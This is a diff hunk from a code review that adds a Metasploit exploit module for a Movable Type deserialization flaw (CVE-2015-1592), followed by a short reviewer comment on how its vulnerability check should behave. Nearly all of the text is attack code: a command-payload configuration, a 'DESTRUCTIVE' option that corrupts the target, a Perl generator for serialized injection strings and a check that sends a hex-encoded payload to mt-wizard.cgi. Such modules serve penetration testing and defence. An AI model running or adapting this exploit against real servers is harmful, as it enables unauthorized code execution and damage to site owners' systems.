modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb

```diff
@@ -0,0 +1,326 @@
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2015-1592' ],
+          [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
+        ],
+      'Privileged'     => false, # web server context
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'BadChars'    => ' ',
+          'Space'       => 1024,
+        },
+      'Compat'         =>
+        {
+          'PayloadType' => 'cmd'
+        },
+      'Platform'       => [ 'unix', 'linux' ],
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Feb 11 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('URI', [ true, "MoveableType cgi-bin directory path", "/cgi-bin/movabletype" ]),
+        OptBool.new('DESTRUCTIVE', [ false, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false]),
+      ], self.class
+    )
+
+  end
+
+=begin
+
+#!/usr/bin/perl
+
+# generate config parameters for injection checks
+
+use Storable;
+
+{
+
+    package XXXCHECKXXX;
+
+    sub STORABLE_thaw {
+        return 1;
+    }
+
+    sub STORABLE_freeze {
+        return 1;
+    }
+
+}
+
+my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
+my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
+$frozen = unpack 'H*', $frozen;
+print "LFI test for storable flaw is: $frozen\n";
+
+{
+    package DateTime;
+    use overload '+' => sub { 'ignored' };
+}
+
+my $datetime_loader = bless \{}, DateTime;
+$frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $datetime_loader});
+$frozen = unpack 'H*', $frozen;
+print "Module load test for DateTime presence is: $frozen\n";
+
+{
+    package Object::MultiType;
+    use overload '+' => sub { 'ignored' };
+}
+
+my $object_multitype_loader = bless \{}, Object::MultiType;
+$frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({x => $object_multitype_loader});
+$frozen = unpack 'H*', $frozen;
+print "Module load test for Obect::MultiType presence is: $frozen\n";
+
+=end
+
+  def check
+    vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure")
+    res = send_request_cgi({
+        'method'    => 'GET',
+        'uri'       => normalize_uri(datastore['URI'], '/mt-wizard.cgi'),
+        'vars_get' => {
+          '__mode' => 'retry',
+          'step'   => 'configure',
+          'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
+        }
+      })
+    if (!res or res.code != 200 or res.body !~ /Can't locate XXXCHECKXXX\.pm/)
+      vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test");
+      return Exploit::CheckCode::Safe
+    end
+
+    if ( datastore['DESTRUCTIVE'] == true )
```

Comment:
ooo I see. Honestly I understand the check result as "is the target vulnerable?". Not if is exploitable with one method or another. So I'd say the sooner you can determine if the target is vulnerable (with confidence) the best. 

Maybe you'd like to listen more opinions here, of course :)